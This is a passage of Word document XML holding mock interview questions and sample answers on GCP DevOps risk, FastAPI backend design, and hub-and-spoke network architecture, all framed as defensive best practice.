      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Explain IAM best practices in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Avoid basic roles, grant least privilege through groups, use custom roles carefully, separate human and workload identities, avoid service account keys, prefer impersonation and Workload Identity, use IAM Conditions, monitor changes, and perform access reviews. Privileged access should be approved, temporary, and logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How do you review Terraform code from a risk perspective?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I check for public exposure, broad IAM, disabled logging, unencrypted resources, missing labels, hardcoded secrets, destructive changes, unsafe modules, missing lifecycle controls, and environment blast radius. I also review the plan output, policy checks, provider versions, backend security, and approval evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you integrate security into CI/CD pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I add branch protection, peer review, SAST, dependency scanning, secret scanning, container scanning, IaC scanning, policy-as-code, tests, artifact signing, provenance, environment approvals, and deployment audit logs. The pipeline should fail fast on high-risk issues and provide clear remediation feedback to developers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What risks exist when using service accounts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risks include overprivilege, key leakage, unclear ownership, cross-project access, long-lived credentials, privilege escalation, and insufficient logging. I reduce these risks with least privilege, no user-managed keys where possible, Workload Identity, service account impersonation, key rotation, owner labels, audit logs, and access reviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you implement least privilege across GCP projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would inventory IAM bindings, map roles to actual usage, remove direct user grants, use groups, replace basic roles with predefined or custom roles, apply IAM Conditions, create environment-specific access, monitor policy changes, and run periodic reviews. I would prioritize production, customer data, and privileged roles first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you monitor cloud security and compliance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I use Security Command Center, Cloud Asset Inventory, audit logs, IAM analysis, vulnerability scanning, org policy reports, SIEM integration, IaC scanning, and custom dashboards. Findings should create tickets with ownership and SLA, and trends should be reported through KRIs such as public exposure, overdue vulnerabilities, and privileged access exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you perform a risk assessment before deploying a new Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would review cluster purpose, data sensitivity, network design, control plane access, node security, RBAC, workload identity, secrets, admission policies, logging, monitoring, backup, upgrade process, multi-tenancy, CI/CD deployment flow, and incident response. I would document risks, required controls, owners, and go-live conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you ensure Infrastructure as Code changes are compliant before deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I use pull request review, Terraform fmt/validate, plan review, IaC security scanning, policy-as-code with OPA/Sentinel, required labels, approved modules, least-privilege CI/CD identities, and environment approvals. I also capture evidence from pipeline runs so compliance is built into the workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Describe a cloud security incident you investigated and the lessons learned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a truthful STAR example. A strong template is: "A misconfiguration exposed a cloud resource. I helped contain access, reviewed logs, rotated credentials if needed, assessed data exposure, communicated impact, and created remediation. The lessons were to add preventive policy checks, better monitoring, clearer ownership, and faster incident playbooks."</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 39 - FastAPI Backend Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. FastAPI fundamentals: How would you structure a production FastAPI service with routers, dependencies, schemas, settings, and clear module boundaries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Organize by domain rather than by technical layer - a directory per feature area containing its own router, Pydantic schemas, and service logic, with shared dependencies (auth, DB session) in a common module imported across features. Use a settings module backed by Pydantic's BaseSettings for typed, validated configuration loaded from environment variables, and register routers on the main app with clear URL prefixes so the module structure and the API structure stay intuitively aligned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. FastAPI request validation: How do Pydantic models, response models, and validation errors help keep APIs safe and predictable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pydantic request models validate and coerce incoming data at the API boundary before any business logic runs, automatically rejecting malformed input with a clear 422 error instead of letting bad data propagate into the application. Response models constrain what's actually returned (preventing accidental over-exposure of internal fields), and consistent validation error formatting means clients can reliably parse and handle errors programmatically rather than guessing at ad-hoc error shapes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. FastAPI async: When should a FastAPI endpoint be async, and what mistakes can block the event loop in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Make an endpoint async when it awaits I/O-bound operations (database calls with an async driver, HTTP calls to other services) so FastAPI can serve other requests while waiting rather than blocking a worker. The common mistake is calling blocking, synchronous code (a sync DB driver, CPU-heavy computation, or `time.sleep`) directly inside an async endpoint, which blocks the entire event loop and stalls every other concurrent request on that worker - blocking work should either use a truly async library or be offloaded to a thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. FastAPI security: How would you implement JWT/OAuth2 authentication, role-based access, secret handling, and least privilege for internal APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use FastAPI's OAuth2PasswordBearer or a JWT dependency that validates the token signature and expiry on every request, extracting claims (user ID, roles) into a reusable `get_current_user` dependency that other endpoints depend on. Implement role-based access as an additional dependency checking required roles against the token's claims, store signing keys/secrets in Secret Manager rather than hardcoded, and design each endpoint's required scope narrowly so a compromised token has the smallest possible blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. FastAPI observability: What logs, metrics, traces, request IDs, and health endpoints would you add before deploying a FastAPI service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add structured JSON logging with a request ID generated per request (via middleware) and propagated through all log lines and downstream calls, Prometheus metrics for request count/latency/error rate exposed at /metrics, and OpenTelemetry tracing instrumented automatically via FastAPI's middleware integration. Include /healthz (liveness) and /readyz (readiness, checking real dependencies like the database) endpoints so Kubernetes probes reflect actual service health, not just process liveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. FastAPI deployment: How would you deploy FastAPI with Uvicorn/Gunicorn, containers, Kubernetes/GKE, autoscaling, probes, and graceful shutdown?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run Uvicorn workers managed by Gunicorn (or Uvicorn's own multi-worker mode) inside a container, sized to the pod's CPU allocation, and deploy on GKE with HPA scaling based on CPU or a custom request-rate metric. Configure readiness/liveness probes hitting dedicated health endpoints, and handle SIGTERM gracefully (Uvicorn supports this natively) so in-flight requests complete before the pod terminates during a rolling update, avoiding dropped connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. FastAPI performance: A FastAPI endpoint has high p95 latency. How would you debug code, database calls, external APIs, concurrency, and infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add tracing spans around each major operation (DB query, external API call, business logic) to see exactly where time is spent for slow requests specifically, not just average latency which can hide a tail-latency problem. Check for blocking synchronous calls inside async endpoints stalling the event loop, database queries missing indexes or running without connection pooling limits, and infrastructure-level saturation (CPU throttling, insufficient replica count for current load) as separate, checkable hypotheses rather than guessing at one cause.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. FastAPI production readiness: What checklist would you use before approving a FastAPI service for production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Confirm structured logging, metrics, and tracing are in place with correlation IDs, health endpoints reflect real dependency status, authentication and least-privilege authorization are implemented and tested, database connections use pooling with sane limits, and graceful shutdown is verified to work under a real rolling update. Also confirm load testing has been done at expected traffic levels, error handling returns consistent, non-leaky error responses, and rollback is a fast, well-understood operation before the service takes real traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 40 - Network Hub Scope and Hub-Spoke Risk Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is a network hub-and-spoke architecture, and why do organizations use it in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A hub-and-spoke architecture uses a central hub network or project to provide shared connectivity, security, DNS, inspection, and access to multiple spoke projects or VPCs. Organizations use it to standardize network controls, reduce duplicated connectivity, centralize governance, and make routing, firewalling, hybrid connectivity, and monitoring easier to manage at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What should be included in the scope of a network hub project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A network hub project usually includes shared VPC host networking, interconnect or VPN termination, Cloud Router, Cloud NAT or egress controls, firewall policy, DNS forwarding or peering, private access to shared services, logging, monitoring, and connectivity to security inspection tools. It should not become an uncontrolled dumping ground for application workloads; ownership boundaries must be clear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design Shared VPC with host and service projects for a hub-and-spoke model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would place shared network resources in a host project and attach service projects for application teams. Network admins own VPCs, subnets, routes, firewall baselines, NAT, DNS, and connectivity, while application teams deploy workloads in service projects with limited permissions. I would separate environments, use IAM groups, enforce org policies, label resources, and document subnet ownership and change workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How does Network Connectivity Center help in a hub-and-spoke network design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Network Connectivity Center provides a managed way to connect and manage network spokes through a central hub for hybrid and cloud connectivity use cases. It helps simplify connectivity between VPCs, on-premises, and branch networks, and gives centralized visibility. From a risk perspective, I would still review route propagation, segmentation, firewall policy, ownership, and whether the design creates unintended reachability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are the routing risks in a hub-and-spoke architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Routing risks include unintended transitive access, overlapping CIDR ranges, route leaks, asymmetric routing, incorrect route priority, blackholed traffic, overly broad dynamic route propagation, and unclear ownership of route changes. I would control these with IP planning, route review, Cloud Router governance, change approvals, route monitoring, and clear documentation of allowed paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you manage firewall rules centrally while still allowing application team ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would define centralized baseline firewall policies for high-risk controls, such as denying public admin ports and allowing only approved shared services. Application teams can request or manage app-specific rules within guardrails using tags, service accounts, approved modules, and review workflows. Logging, expiration dates, owner labels, and periodic cleanup are important to prevent rule sprawl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you design DNS resolution across hub, spoke, on-premises, and private GCP services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would define a DNS architecture with Cloud DNS private zones, DNS peering or forwarding, inbound and outbound forwarding policies, and clear ownership of zones. I would ensure on-premises and GCP name resolution works consistently, avoid conflicting zones, protect sensitive records, log DNS queries where needed, and test failover and split-horizon behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What are the security risks of VPC peering, and what limitations should you consider?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPC peering can create broad private connectivity if routes and firewall rules are not controlled. Risks include unintended access between environments, overlapping IP ranges, unclear ownership, and weak monitoring. Important limitations include non-transitive peering and route exchange constraints. For large environments, Shared VPC, Network Connectivity Center, or a more deliberate hub design may be safer than many ad hoc peerings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you design outbound internet access through Cloud NAT or centralized egress controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would avoid giving workloads unnecessary public IPs and route outbound traffic through Cloud NAT or centralized egress controls. For sensitive environments, I would use egress allowlists, proxy or inspection layers, logging, DNS controls, and workload identity-based access where possible. I would also monitor unusual destinations, high egress volume, and changes to NAT or route configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you segment production, non-production, shared services, and third-party connectivity in a hub network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
